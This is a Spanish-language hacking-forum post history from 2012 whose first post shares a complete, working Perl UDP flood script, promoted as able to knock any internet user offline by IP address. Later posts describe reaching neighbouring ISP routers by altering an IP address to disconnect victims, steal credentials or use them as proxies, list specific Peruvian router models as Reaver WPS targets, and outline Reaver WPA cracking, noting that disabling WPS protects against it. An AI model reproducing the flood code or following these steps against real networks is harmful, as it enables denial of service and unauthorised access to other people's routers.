elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Bugs y Exploits / script perl "Al descubierto" en: 15 Julio 2012, 21:23 pm
Hola a todos comparto este script source en perl , solo para aquellas personas que saben script y algo de perl si lo logran hacerlo bien , podran tumbar cualquier usuario en internet , tan solo con su ip

bueno comencemos :d

Claro necesitan tener instalado perl

URL Oficial http://wiki.nil.com/UDP_flood_in_Perl

imagenes de prueba :



POSTDATA: No soy responsable con el uso , solo comparto como muchos lo hacen saludos y espero que lo hagan para labs pruebas saludos...

codigo del source para los que no veen y esten preguntando cosas de gays jaja como no me funciona jaja bueno ya les dije arriba para los que saben perl se les hara muy facil

no soy la persona que  gusta dar todo masticado ...

Código:
#!/usr/bin/perl
#####################################################
# udp flood.
######################################################

use Socket;
use strict;
use Getopt::Long;
use Time::HiRes qw( usleep gettimeofday ) ;

our $port = 0;
our $size = 0;
our $time = 0;
our $bw   = 0;
our $help = 0;
our $delay= 0;

GetOptions(
"port=i" => \$port, # UDP port to use, numeric, 0=random
"size=i" => \$size, # packet size, number, 0=random
"bandwidth=i" => \$bw, # bandwidth to consume
"time=i" => \$time, # time to run
"delay=f"=> \$delay, # inter-packet delay
"help|?" => \$help); # help


my ($ip) = @ARGV;

if ($help || !$ip) {
  print <<'EOL';
flood.pl --port=dst-port --size=pkt-size --time=secs
         --bandwidth=kbps --delay=msec ip-address

Defaults:
  * random destination UDP ports are used unless --port is specified
  * random-sized packets are sent unless --size or --bandwidth is specified
  * flood is continuous unless --time is specified
  * flood is sent at line speed unless --bandwidth or --delay is specified

Usage guidelines:
  --size parameter is ignored if both the --bandwidth and the --delay
    parameters are specified.

  Packet size is set to 256 bytes if the --bandwidth parameter is used
    without the --size parameter

  The specified packet size is the size of the IP datagram (including IP and
  UDP headers). Interface packet sizes might vary due to layer-2 encapsulation.

Warnings and Disclaimers:
  Flooding third-party hosts or networks is commonly considered a criminal activity.
  Flooding your own hosts or networks is usually a bad idea
  Higher-performace flooding solutions should be used for stress/performance tests
  Use primarily in lab environments for QoS tests
EOL
  exit(1);
}

if ($bw && $delay) {
  print "WARNING: computed packet size overwrites the --size parameter ignored\n";
  $size = int($bw * $delay / 8);
} elsif ($bw) {
  $delay = (8 * $size) / $bw;
}

$size = 256 if $bw && !$size;

($bw = int($size / $delay * 8)) if ($delay && $size);

my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " .
  ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n";
print "Interpacket delay $delay msec\n" if $delay;
print "total IP bandwidth $bw kbps\n" if $bw;
print "Break with Ctrl-C\n" unless $time;

die "Invalid packet size requested: $size\n" if $size && ($size < 64 || $size > 1500);
$size -= 28 if $size;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
  usleep(1000 * $delay) if $delay;
}

saludos



2  Comunicaciones / Redes / duda , repeater ap en: 16 Junio 2012, 03:55 am
hola a todos tengo la siguiente duda  :rolleyes: , tengo un acces point modelo TL-WA500G

se algunas opciones para que sirven pero yo queria preguntar para que sirve esta 2 dichas opciones



3  Seguridad Informática / Hacking Wireless / Bug en Telefonica permite acceder cualquier router abierto en: 14 Marzo 2012, 16:45 pm
Hola a todos debido a que mi pc ,anda mal no puedo hacer un video tutorial haci que les muestro imagenes :D

Este bug algunos lo saben otros no !

Entramos a google.com.pe


Y ponemos mi ip http://www.cual-es-mi-ip.net/

Nos daran nuestra ip , ahora en el navegador borramos http://www.cual-es-mi-ip.net/
y ponemos la ip que nos ha dado un ejemplo

190.233.172.24

Esa es nuestra ip , luego que pasa si hacemos 190.233.172.1 , vamos ha entrar ha otro router esto quiere decir que podemos ver el nombre del wifi ho , Dejar sin linea la victima

2.- Podemos sacar credenciales para aumentar la velocidad de nuestro internet

3.- Utilizarlos como proxy

Bueno sin mas que decir

yo he probado esto desde los 16 años y aun sirve  ;D

Aqui le dejo un video tutorial , cuando antes hera de otra web xD  :silbar:



Fuente : elhacker.net

Si van ha llebarlo ha otro foro recuerden poner el link de donde lo sacaron  :silbar:

Saludos
4  Seguridad Informática / Hacking Wireless / router / Modem Vulnerable antes el ataque ha Reaver 1.3 en: 14 Marzo 2012, 16:05 pm
Hola probando en mi Universidad con unos amigos decidimos hacer prueba de laboratorio wifi usando la herramienta reaver , con 4 router  y los router vulnerable son los siguientes , en mi pais Telefonica los routers mas usado son :D

Peru:

1.- Router vulnerable ZXV10 W300 , he visto que casi la mayoria que contactan internet tienen este router,No importa la version del router trae habilitado el WPS por defecto y nadie sabe al respeto de reaver , Ni Telefonica Solamente el equipo de Seguridad de Telefonica No se pero no veo que hacen mantenimiento bueno sigamos :D

Alias Name    ZXV10 W300
Uptime(hh:mm:ss)    1 day 21:36:15
Software Version    W300V2.1.0h_ER7_PE_O57
DSP Version    2.9.0.5a



otra version del mismo fabricante vulnerable



2.- Router vulnerable : zyxel P-666HW-T1 2 - Y tambien la version 3





Ustedes diran pero porque Zyxel es vulnerable ante este ataque : Doy la respuestas en PV 2

Saludos espero que asi puedan ver que routers van ha atakar pueden usar el programa vistumbler para ver que router tienen a su alrededor saludos compartiendo solo lo mejor

He probando con estos routers porque no tengo mas router jejeje xD  :silbar:
5  Seguridad Informática / Hacking Wireless / crack wpa / wpa2 Usando Reaver 1.3 en: 8 Marzo 2012, 19:28 pm
Hola chicos!

 

Hoy nos van a echar un vistazo a la nueva herramienta de hacking de WPA/WPA2, Reaver.

 

Esta herramienta bruteforces la configuración protegida Wi-Fi, que utiliza un PIN de 8 dígitos que contiene desconocidos, si usted hace la matemáticas (10 ^ 8) que es alrededor de 100.000.000 de posibilidades. Al descubrir el PIN, atracador responde de nuevo la WPA / WPA 2 llave.

 

Tenga en cuenta que no todos los routers se ven afectados por esto, como la persona que ha configurado el router haya desactivado WPS. Se sabe sin embargo, que la mayoría de los routers vienen con WPS habilitado.



La protección contra este ataque es simple: desactivar WPS. Esto se hace mediante el acceso a su router (192.168.1.1 por lo general en menos de una red de clase C), después de la conexión, deshabilite WPS.

 

Ahora vamos a ver el video en HD



Usuarios Advanzados sabran poner el video en ingles hay un icono llamado "CC" eso sirve para traducir ha nuestro idioma

Compartiendo solo lo mejor ,

Espero que con este manual puedan prevenir y hacer un ataque en tiempo Real ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines